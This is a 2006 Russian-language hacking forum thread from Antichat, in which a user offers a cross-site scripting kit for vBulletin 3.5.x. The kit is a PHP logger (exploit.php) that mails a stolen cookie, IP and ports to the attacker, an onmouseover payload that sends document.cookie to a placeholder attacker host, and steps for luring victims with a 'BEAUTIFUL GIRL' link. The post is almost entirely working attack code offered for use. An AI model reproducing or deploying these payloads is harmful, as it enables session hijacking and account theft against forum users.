ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
  #1  
Старый 20.04.2006, 18:06
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
работает отлично!

Код:
( 1 ) 

-------------------------------------------------------------------- 

Name file:  exploit.php 

-------------------------------------------------------------------- 


<?php 
$ip_adresse = $_SERVER['REMOTE_ADDR']; 
if(!empty($ip_adresse)) 
{ 
echo 'il tuo ip и: ',$ip_adresse; 
} 
else 
{ 
echo 'Impossible d\'afficher l\'IP'; 
} 
?> 

<a href="log.php"></a><? 
$xx1=$HTTP_SERVER_VARS['SERVER_PORT']; 
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); 
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; 
else $visitor_info = $REMOTE_HOST; 
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; 
$x1=`host $REMOTE_ADDR|grep Name`; 
$x2=$REMOTE_PORT; 
?> 

<?php 
$cookie = $_GET['c']; 
?> 

<?php 
$myemail = "YOUR ADDRESS E-MAIL"; 
$today = date("l, F j, Y, g:i a") ; 
$subject = "Xss Vbulletin" ; 
$message = "Xss: Hacking 
Ip: $ip_adresse 
Cookie: $cookie 
Url: $base 
porta usata: $xx1 
remote port: $x2 
Giorno & Ora : $today  \n 
"; 
$from = "From: $myemail\r\n"; 
mail($myemail, $subject, $message, $from); 
?> 



-------------------------------------------------------------------- 

<?php 
$myemail = "YOUR ADDRESS E-MAIL"; 

-------------------------------------------------------------------- 


( 2 ) 

-------------------------------------------------------------------- 

Name file:  image.gif 

-------------------------------------------------------------------- 


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > 


-------------------------------------------------------------------- 

location="http://YOUR ADDRESS WEB.com 

-------------------------------------------------------------------- 


( 3 ) 

-------------------------------------------------------------------- 

Like Using 
-------------------------------------------------------------------- 

1°  new thread 
2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> ' 
3°  Submit 
4°  It waits for 

--------------------------------------------------------------------
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
vBulletin v3.5.4 micle Форумы 3 15.04.2006 23:47
Уязвимости форумов phpbb 2.0.15 exbbxak Форумы 105 10.08.2005 20:19
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Уязвимости Vbulletin и здешний форум Монгол Форумы 6 03.12.2004 15:27
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ